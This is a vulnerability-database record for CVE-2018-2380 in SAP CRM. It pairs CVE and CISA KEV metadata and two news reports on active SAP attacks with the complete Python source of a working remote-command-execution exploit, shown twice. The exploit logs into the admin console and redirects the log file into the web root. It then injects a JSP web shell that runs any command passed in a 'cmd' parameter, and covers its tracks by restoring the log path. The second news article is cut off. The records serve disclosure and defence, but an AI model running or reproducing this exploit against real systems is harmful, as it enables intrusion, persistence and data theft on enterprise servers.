_url_write_shell_to_log_file = \"{0}://{1}/b2b/init.do?\\\"%22]{2}[%22\\\"\".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))\r\n \r\n # data variable\r\n _post_data_restore_log_path = {\"selConfigName\": \"com.sap.isa\",\r\n \"selSeverity\": \"0\",\r\n \"selDest\": \"./default_log_name.log\",\r\n \"selLimit\": \"10485760\",\r\n \"selCount\": \"20\",\r\n \"selFormatterType\": \"ListFormat\",\r\n \"selPattern\": \"none\",\r\n \"mode\": \"save\",\r\n \"selLocationIdx\": \"1\"}\r\n _post_data_to_change_log_path = {\"selConfigName\": \"com.sap.isa\",\r\n \"selSeverity\": \"0\",\r\n \"selDest\": \"C:\\\\usr\\\\sap\\\\{0}\\\\J00\\\\j2ee\\\\cluster\\\\apps\\\\sap.com\\\\com.sap.engine.docs.examples\\\\servlet_jsp\\\\_default\\\\root\\\\{1}.jsp\".format(sid, _shell_name),\r\n \"selLimit\": \"10485760\",\r\n \"selCount\": \"20\",\r\n \"selFormatterType\": \"ListFormat\",\r\n \"selPattern\": \"none\",\r\n \"mode\": \"save\",\r\n \"selLocationIdx\": \"1\"}\r\n \r\n print(\"{0} \\n[!] Try to get RCE using log injection \".format(baner))\r\n \r\n print(\"[!] Get j_salt token for requests\")\r\n res = requests.get(_irj_portal, headers=_headers, verify=False)\r\n soup = BeautifulSoup(res.text, \"html.parser\")\r\n e = soup.find(\"input\", {\"name\": \"j_salt\"})\r\n __j_salt = e['value']\r\n \r\n print(\"[!] Login to the SAP portal\")\r\n req_adapter.post(_b2b_admin_url,\r\n headers=_headers,\r\n data={\"login_submit\": \"on\", \"login_do_redirect\": \"1\", \"j_salt\": __j_salt,\r\n \"j_username\": \"{0}\".format(_username), \"j_password\": \"{0}\".format(admin_password),\r\n \"uidPasswordLogon\": \"Log On\"}, verify=False)\r\n \r\n print(\"[!] Change log path \")\r\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)\r\n \r\n print(\"[!] Upload \\\"Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\")) \\\" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig\".format(base_scheme,_server_ip_port, _shell_name))\r\n req_adapter.get(_url_write_shell_to_log_file, headers=_headers)\r\n \r\n print(\"[!] Restore logs path to ./default_log_name.log\")\r\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)\r\n \r\n print(\"[!] Enjoy!\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)\r\n parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')\r\n parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')\r\n \r\n parser.add_argument('-u', '--username', help='SAP CRM administrator')\r\n parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')\r\n \r\n parser.add_argument('-s', '--SID', help='SAP SID')\r\n parser.add_argument('-S', '--ssl', help='Use ssl connection')\r\n \r\n args = parser.parse_args()\r\n args_dict = vars(args)\r\n \r\n host = args_dict['host']\r\n port = args_dict['port']\r\n username = args_dict['username']\r\n password = args_dict['password']\r\n sid = args_dict['SID']\r\n ssl = args.ssl\r\n start(host, port, username, password, sid, ssl)\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/29994", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-12-03T16:07:25", "description": "SAP Customer Relationship Management (CRM) contains a path traversal vulnerability that allows an attacker to exploit insufficient validation of path information provided by users.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "SAP Customer Relationship Management (CRM) Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-2380", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-03T15:19:16", "description": "SAP CRM, 7.01, 7.02,7.30, 7.31, 7.33, 7.54, allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \"traverse to parent directory\" are passed through to the file APIs.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2018-03-01T17:29:00", "type": "cve", "title": "CVE-2018-2380", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-23T16:39:00", "cpe": ["cpe:/a:sap:customer_relationship_management:7.33", "cpe:/a:sap:customer_relationship_management:7.54", "cpe:/a:sap:customer_relationship_management:7.30", "cpe:/a:sap:customer_relationship_management:7.01", "cpe:/a:sap:customer_relationship_management:7.02", "cpe:/a:sap:customer_relationship_management:7.31"], "id": "CVE-2018-2380", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2380", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sap:customer_relationship_management:7.31:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.30:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.33:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.54:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2023-12-03T15:53:56", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2018-03-14T00:00:00", "type": "exploitdb", "title": "SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-2380", "CVE-2018-2380"], "modified": "2018-03-14T00:00:00", "id": "EDB-ID:44292", "href": "https://www.exploit-db.com/exploits/44292", "sourceData": "#!/usr/bin/env python\r\nimport argparse\r\nimport urllib\r\n\r\nimport requests, random\r\nfrom bs4 import BeautifulSoup\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nhelp_desc = '''\r\nPoC of Remote Command Execution via Log injection on SAP CRM\r\n-- ERPScan\r\n\r\npython crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true\r\n'''\r\nbaner = '''\r\n _______ _______ _______ _______ _______ _______ _\r\n( ____ \\( ____ )( ____ )( ____ \\( ____ \\( ___ )( ( /|\r\n| ( \\/| ( )|| ( )|| ( \\/| ( \\/| ( ) || \\ ( |\r\n| (__ | (____)|| (____)|| (_____ | | | (___) || \\ | |\r\n| __) | __)| _____)(_____ )| | | ___ || (\\ \\) |\r\n| ( | (\\ ( | ( ) || | | ( ) || | \\ |\r\n| (____/\\| ) \\ \\__| ) /\\____) || (____/\\| ) ( || ) \\ |\r\n(_______/|/ \\__/|/ \\_______)(_______/|/ \\||/ )_)\r\nVahagn @vah_13 Vardanian\r\nBob @NewFranny\r\nCVE-2018-2380\r\n\r\n'''\r\n\r\n\r\ndef start(ip, port, username, password, sid, ssl):\r\n if ssl == None:\r\n base_scheme = 'http'\r\n else:\r\n base_scheme = 'https'\r\n req_adapter = requests.session()\r\n _server_ip_port = \"{0}:{1}\".format(ip, port)\r\n _username = username\r\n admin_password = password\r\n _headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Referer\": \"{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\".format(\r\n base_scheme,_server_ip_port)\r\n }\r\n\r\n # shell name\r\n _shell_name = \"ERPScan_shell_{0}\".format(random.randint(1337, 31337))\r\n\r\n # shell_code\r\n shell_code = '''\r\n <%@ page import=\"java.util.*,java.io.*\"%>\r\n <% \r\n if (request.getParameter(\"cmd\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\r\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n } \r\n }\r\n %>\r\n '''\r\n # urls variables\r\n _irj_portal = \"{0}://{1}/irj/portal\".format(base_scheme,_server_ip_port)\r\n _b2b_admin_url = \"{0}://{1}/b2b/admin/index.jsp\".format(base_scheme,_server_ip_port)\r\n _url_of_log_path = \"{0}://{1}/b2b/admin/logging.jsp\".format(base_scheme,_server_ip_port)\r\n _url_write_shell_to_log_file = \"{0}://{1}/b2b/init.do?\\\"%22]{2}[%22\\\"\".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))\r\n\r\n # data variable\r\n _post_data_restore_log_path = {\"selConfigName\": \"com.sap.isa\",\r\n \"selSeverity\": \"0\",\r\n \"selDest\": \"./default_log_name.log\",\r\n \"selLimit\": \"10485760\",\r\n \"selCount\": \"20\",\r\n \"selFormatterType\": \"ListFormat\",\r\n \"selPattern\": \"none\",\r\n \"mode\": \"save\",\r\n \"selLocationIdx\": \"1\"}\r\n _post_data_to_change_log_path = {\"selConfigName\": \"com.sap.isa\",\r\n \"selSeverity\": \"0\",\r\n \"selDest\": \"C:\\\\usr\\\\sap\\\\{0}\\\\J00\\\\j2ee\\\\cluster\\\\apps\\\\sap.com\\\\com.sap.engine.docs.examples\\\\servlet_jsp\\\\_default\\\\root\\\\{1}.jsp\".format(sid, _shell_name),\r\n \"selLimit\": \"10485760\",\r\n \"selCount\": \"20\",\r\n \"selFormatterType\": \"ListFormat\",\r\n \"selPattern\": \"none\",\r\n \"mode\": \"save\",\r\n \"selLocationIdx\": \"1\"}\r\n\r\n print(\"{0} \\n[!] Try to get RCE using log injection \".format(baner))\r\n\r\n print(\"[!] Get j_salt token for requests\")\r\n res = requests.get(_irj_portal, headers=_headers, verify=False)\r\n soup = BeautifulSoup(res.text, \"html.parser\")\r\n e = soup.find(\"input\", {\"name\": \"j_salt\"})\r\n __j_salt = e['value']\r\n\r\n print(\"[!] Login to the SAP portal\")\r\n req_adapter.post(_b2b_admin_url,\r\n headers=_headers,\r\n data={\"login_submit\": \"on\", \"login_do_redirect\": \"1\", \"j_salt\": __j_salt,\r\n \"j_username\": \"{0}\".format(_username), \"j_password\": \"{0}\".format(admin_password),\r\n \"uidPasswordLogon\": \"Log On\"}, verify=False)\r\n\r\n print(\"[!] Change log path \")\r\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)\r\n\r\n print(\"[!] Upload \\\"Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\")) \\\" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig\".format(base_scheme,_server_ip_port, _shell_name))\r\n req_adapter.get(_url_write_shell_to_log_file, headers=_headers)\r\n\r\n print(\"[!] Restore logs path to ./default_log_name.log\")\r\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)\r\n\r\n print(\"[!] Enjoy!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)\r\n parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')\r\n parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')\r\n\r\n parser.add_argument('-u', '--username', help='SAP CRM administrator')\r\n parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')\r\n\r\n parser.add_argument('-s', '--SID', help='SAP SID')\r\n parser.add_argument('-S', '--ssl', help='Use ssl connection')\r\n\r\n args = parser.parse_args()\r\n args_dict = vars(args)\r\n\r\n host = args_dict['host']\r\n port = args_dict['port']\r\n username = args_dict['username']\r\n password = args_dict['password']\r\n sid = args_dict['SID']\r\n ssl = args.ssl\r\n start(host, port, username, password, sid, ssl)", "sourceHref": "https://www.exploit-db.com/raw/44292", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:23", "description": "[![](https://thehackernews.com/images/-dxgYH4aIuuw/YGxlNUtGVCI/AAAAAAAACLs/oKpHnFXRhZwabJSwosFF7e-iA0QdpeyNgCLcBGAsYHQ/s0/sap.jpg)](<https://thehackernews.com/images/-dxgYH4aIuuw/YGxlNUtGVCI/AAAAAAAACLs/oKpHnFXRhZwabJSwosFF7e-iA0QdpeyNgCLcBGAsYHQ/s0/sap.jpg>)\n\nCyber attackers are actively setting their sights on unsecured SAP applications in an attempt to steal information and sabotage critical processes, according to new research.\n\n\"Observed exploitation could lead in many cases to full control of the unsecured SAP application, bypassing common security and compliance controls, and enabling attackers to steal sensitive information, perform financial fraud or disrupt mission-critical business processes by deploying ransomware or stopping operations,\" cybersecurity firm Onapsis and SAP [said](<https://onapsis.com/active-cyberattacks-mission-critical-sap-applications>) in a joint report published today.\n\nThe Boston-based company said it detected over 300 successful exploitations out of a total of 1,500 attempts targeting previously known vulnerabilities and insecure configurations specific to SAP systems between mid-2020 to March 2021, with multiple brute-force attempts made by adversaries aimed at high-privilege SAP accounts as well as chaining together several flaws to strike SAP applications.\n\nApplications that have been targeted include, but not limited to enterprise resource planning (ERP), supply chain management (SCM), human capital management (HCM), product lifecycle management (PLM), customer relationship management (CRM), and others.\n\nTroublingly, Onapsis report outlines weaponization of SAP vulnerabilities in less than 72 hours from the release of patches, with new unprotected SAP applications provisioned in cloud environments being discovered and compromised in less than 3 hours.\n\nIn one case, a day after SAP issued a patch for [CVE-2020-6287](<https://us-cert.cisa.gov/ncas/alerts/aa20-195a>) (more below) on July 14, 2020, a proof-of-concept exploit emerged in the wild, which was followed by mass scanning activity on July 16 and the release of a fully-functional public exploit on July 17, 2020.\n\nThe attack vectors were no less sophisticated. The adversaries were found to adopt a varied set of techniques, tools, and procedures to gain initial access, escalate privileges, drop web shells for arbitrary command execution, create SAP administrator users with high privileges, and even extract database credentials. The attacks themselves were launched with the help of TOR nodes and distributed virtual private servers (VPS).\n\n[![](https://thehackernews.com/images/-thOJEuCUSH4/YGxjK5MJGmI/AAAAAAAACLk/k5kYRCll1SYAktNePrl_GDL-cUcYgfNswCLcBGAsYHQ/s0/cyberattack.jpg)](<https://thehackernews.com/images/-thOJEuCUSH4/YGxjK5MJGmI/AAAAAAAACLk/k5kYRCll1SYAktNePrl_GDL-cUcYgfNswCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nThe six flaws exploited by threat actors include \u2014\n\n * [**CVE-2010-5326**](<https://nvd.nist.gov/vuln/detail/CVE-2010-5326>) (CVSS score: 10) - Remote code execution flaw in SAP NetWeaver Application Server (AS) Java\n * [**CVE-2016-3976**](<https://nvd.nist.gov/vuln/detail/CVE-2016-3976>) (CVSS score: 7.5) - Directory traversal vulnerability in SAP NetWeaver AS Java\n * [**CVE-2016-9563**](<https://nvd.nist.gov/vuln/detail/CVE-2016-9563>) (CVSS score: 6.4) - XML External Entity ([XXE](<https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/>)) expansion vulnerability in BC-BMT-BPM-DSK component of SAP NetWeaver AS Java\n * [**CVE-2018-2380**](<https://nvd.nist.gov/vuln/detail/CVE-2018-2380>) (CVSS score: 6.6) - Directory traversal vulnerability in Internet Sales component in SAP CRM\n * [**CVE-2020-6207**](<https://nvd.nist.gov/vuln/detail/CVE-2020-6207>) (CVSS score: 9.8) - Missing authentication check in SAP Solution Manager\n * [**CVE-2020-6287**](<https://nvd.nist.gov/vuln/detail/CVE-2020-6287>) (CVSS score: 10) - RECON (aka Remotely Exploitable Code On NetWeaver) flaw in LM Configuration Wizard component \n\nFirst disclosed in July 2020, successful exploitation of [CVE-2020-6287](<https://thehackernews.com/2020/07/sap-netweaver-vulnerability.html>) could give an unauthenticated attacker full access to the affected SAP system, counting the \"ability to modify financial records, steal personally identifiable information (PII) from employees, customers and suppliers, corrupt data, delete or modify logs and traces and other actions that put essential business operations, cybersecurity and regulatory compliance at risk.\"\n\nOnapsis also said it was able to detect scanning activity for CVE-2020-6207 dating back to October 19, 2020, almost three months before the public release of a [fully-working exploit](<https://thehackernews.com/2021/01/beware-fully-functional-released-online.html>) on January 14, 2021, implying that threat actors had knowledge of the exploit prior to the public disclosure.\n\nFurthermore, a separate attack observed on December 9 was found to chain exploits for three of the flaws, namely CVE-2020-6287 for creating an admin user and logging in to the SAP system, CVE-2018-2380 for privilege escalation, and CVE-2016-3976 for access to high-privileged accounts and the database.\n\n\"This all happened within 90 minutes,\" Onapsis researchers noted.\n\nWhile no customer breaches have been uncovered, both SAP and Onapsis are urging businesses to perform a compromise assessment of applications, apply relevant patches, and address misconfigurations to prevent unauthorized access.\n\n\"The critical findings [...] describe attacks on vulnerabilities with patches and secure configuration guidelines available for months and even years,\" Onapsis CEO Mariano Nunez said. \"Unfortunately, too many organizations still operate with a major governance gap in terms of the cybersecurity and compliance of their mission-critical applications, allowing external and internal threat actors to access, exfiltrate and gain full control of their most sensitive and regulated information and processes.\"\n\n\"Companies that have not prioritized rapid mitigation for these known risks should consider their systems compromised and take immediate and appropriate action,\" Nunez added.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also published an [alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) warning of ongoing nefarious cyber activity in the SAP threat landscape, stating that \"systems running outdated or misconfigured software are exposed to increased risks of malicious attacks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-06T13:43:00", "type": "thn", "title": "Watch Out! Mission Critical SAP Applications Are Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-2380", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-07T04:31:36", "id": "THN:3C21F3359B50A4527A83BD7E63B731B2", "href": "https://thehackernews.com/2021/04/watch-out-mission-critical-sap.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-07T18:10:44", "description": "Active cyberattacks on known vulnerabilities in SAP systems could lead to full control of unsecured SAP applications, researchers are warning.\n\nAdversaries are carrying out a range of attacks, according to [an alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) from SAP and security firm Onapsis issued Tuesday \u2013 including theft of sensitive data, financial fraud, disruption of mission-critical business processes and other operational disruptions, and delivery of ransomware and other malware.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nSAP applications help organizations manage critical business processes \u2013 including enterprise resource planning (ERP), product lifecycle management, customer relationship management (CRM) and supply-chain management.\n\nFrom mid-2020 until today, Onapsis researchers have recorded more than 300 successful exploit attempts on unprotected SAP instances.\n\n## Who\u2019s at Risk?\n\nUnfortunately, the ongoing attacks could have far-reaching consequences, as SAP noted in the warning:\n\n\u201cThese are the applications that 92 percent of the Forbes Global 2000 have standardized on SAP to power their operations and fuel the global economy,\u201d the alert noted. \u201cWith more than 400,000 organizations using SAP, 77 percent of the world\u2019s transactional revenue touches an SAP system. These organizations include the vast majority of pharmaceutical, critical infrastructure and utility companies, food distributors, defense and many more.\u201d\n\nGovernment agencies should take particular notice of the spate of attacks, researchers said.\n\n\u201cSAP systems are a prominent attack vector for bad actors,\u201d Kevin Dunne, president at Pathlock, told Threatpost. \u201cMost federal agencies are running on SAP, as it has become the industry standard for government entities. However, these SAP implementations are often on-premise, and managed by the government entities themselves due to security concerns. These systems then become increasingly vulnerable when updates and patches are not applied in a timely fashion, leaving them wide open for interested hackers.\u201d\n\nThe technology sector is another hot target for attacks, according to Setu Kulkarni, vice president of strategy at WhiteHat Security.\n\n\u201cOur reporting has found that independent software vendors (ISVs) and technology companies have and inordinately high window of exposure,\u201d he told Threatpost. \u201cWe are seeing that ISVs and technology companies are lacking in their security rigor as they ultimately may pass on the security responsibilities to the companies that use the ISV to build products for their customers.\u201d\n\n## **Active Exploitation**\n\nThe attacks are brute-forcing high-privilege SAP user accounts, as well as exploiting a raft of known bugs: [CVE-2020-6287](<https://nvd.nist.gov/vuln/detail/CVE-2020-6287>), [CVE-2020-6207](<https://nvd.nist.gov/vuln/detail/CVE-2020-6207>), [CVE-2018-2380](<https://nvd.nist.gov/vuln/detail/CVE-2018-2380>), [CVE-2016-9563](<https://nvd.nist.gov/vuln/detail/CVE-2016-9563>), [CVE-2016-3976](<https://nvd.nist.gov/vuln/detail/CVE-2016-3976>) and [CVE-2010-5326](<https://nvd.nist.gov/vuln/detail/CVE-2010-5326>), according to the warning.\n\nThe adversaries are \u201cadvanced threat actors,\u201d according to Onapsis, as evidenced by how quickly they\u2019ve been able to develop exploits, among other things.\n\nThere is \u201cconclusive evidence that cyberattackers are actively targeting and exploiting unsecured SAP applications, through a varied set of techniques, tools and procedures and clear indications of sophisticated knowledge of mission-critical applications,\u201d the alert reads. \u201cThe window for defenders is significantly smaller than previously thought, with examples of SAP vulnerabilities being weaponized in less than 72 hours since the release of patches, and new unprotected SAP applications provisioned in cloud (IaaS) environments being discovered and compromised in less than three hours.\u201d\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/06130028/SAp-1024x319.png)\n\nSource: Onapsis.\n\nThe issues are as follows:\n\n * CVE-2020-6287 is a [critical authentication bypass issue](<https://threatpost.com/critical-sap-bug-enterprise-system-takeover/157392/>) in SAP NetWeaver Application Server Java allowing full account takeover;\n * CVE-2020-6207 is another critical authentication bypass bug, in SAP Solution Manager;\n * CVE-2018-2380 is a medium-severity flaw in SAP CRM, which allows an attacker to exploit insufficient validation of path information provided by users;\n * CVE-2016-9563 is also a medium-severity bug, this time in SAP NetWeaver AS Java. Remote authenticated users can exploit it to conduct XML External Entity (XXE) attacks, which allow them to interfere with XML processing;\n * CVE-2016-3976 is a high-severity directory traversal vulnerability in SAP NetWeaver AS Java that allows remote attackers to read arbitrary files;\n * And CVE-2010-5326 is an 11-year-old critical issue in the Invoker Servlet on SAP NetWeaver AS Java. It doesn\u2019t require authentication, which allows remote attackers to execute arbitrary code via an HTTP or HTTPS request.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/06141350/SAP-vulnerability-groups-300x169.png)\n\nExploit uses \u2013 click to enlarge. Source: Onapsis.\n\nAfter initial access, Onapsis observed threat actors using the vulnerabilities to establish persistence, for privilege escalation, evasion and, ultimately, complete control of SAP systems, including financial, human capital management and supply-chain applications.\n\n\u201cAdditionally, attempts at chaining vulnerabilities to achieve privilege escalation for OS-level access were observed, expanding potential impact beyond SAP systems and applications,\u201d according to the analysis.\n\nAs an example, Onapsis said that one actor was able to scan and create an admin user utilizing an exploit utility for CVE-2020-6287. Upon successfully creating the profile and logging in, additional exploits were executed against CVE-2018-2380 for shell upload, as the attackers tried to access the operating system layer. Following that, exploits for CVE-2016-3976 were executed, targeting the download of a \u201ccredential store,\u201d which provides access to logins for high-privileged accounts and the core database. Worryingly, this all happened within 90 minutes, according to Onapsis.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/06132248/SAP-chaining-1024x568.png)\n\nExploit chaining. Source: Onapsis.\n\nInterestingly, the cyberattackers in some cases are patching the exploited vulnerabilities after they\u2019ve gained access to a victim\u2019s environment, Onapsis said.\n\n\u201cThis action illustrates the threat actors\u2019 advanced domain knowledge of SAP applications, access to the manufacturer\u2019s patches and their ability to reconfigure these systems,\u201d according to the firm. \u201cThis technique is often used by threat actors to deploy backdoors on seemingly patched systems to maintain persistence or to evade detection.\u201d\n\n## **Who\u2019s Behind the SAP Attacks?**\n\nThe activity is being mounted by multiple groups, who appear to be engaged in coordinated activity across vast swathes of infrastructure, according to the alert.\n\n\u201cAttackers [are] triggering exploitation from different source systems from the ones used to perform subsequent manual logins were detected, indicating the possibility of coordinated groups and/or actors leveraging wide-spread attack infrastructure,\u201d it reads. \u201cWhile this behavior is common when analyzing operating system and network-based attacks, this data provides evidence that the same approach is also used when targeting mission-critical applications, as these actors use TOR nodes and distributed VPS infrastructures to launch the attacks and escalate privileges.\u201d\n\nThe activity is originating from all over the world, including Hong Kong, India, Japan, the Netherlands, Singapore, South Korea, Sweden, Taiwan, United States, Vietnam and Yemen.\n\n## **How Can I Prevent an Attack?**\n\nThe main way to thwart these kinds of attacks is to patch the vulnerabilities. Also, any web-facing accounts should have unique passwords to disallow automated brute-force attempts to break in; and any systems that don\u2019t need to face the public web should be taken offline.\n\n\u201cAll observed exploited critical weaknesses have been promptly patched by SAP, and have been available to customers for months and years in some cases,\u201d the alert noted. \u201cUnfortunately, both SAP and Onapsis continue to observe many organizations that have still not applied the proper mitigations\u2026allowing unprotected SAP systems to continue to operate and, in many cases, remain visible to attackers via the internet.\u201d\n\nAlso, while applying security patches in a timely fashion is critical to closing down the risk from major, known vulnerabilities, Pathlock\u2019s Dunne pointed out that patching can only remedy issues that are in the rear-view. With cyberattackers patching the bugs behind them, there also needs to be a way to detect malicious activity.\n\n\u201cFor a comprehensive, forward looking approach to SAP security, organizations need to implement a comprehensive solution to monitor user activities within the system, including interactions with sensitive data,\u201d he told Threatpost. \u201cThis way, even attackers that are able to breach SAP systems by known or unknown vulnerabilities can still be identified and their damage can be mitigated in real-time.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 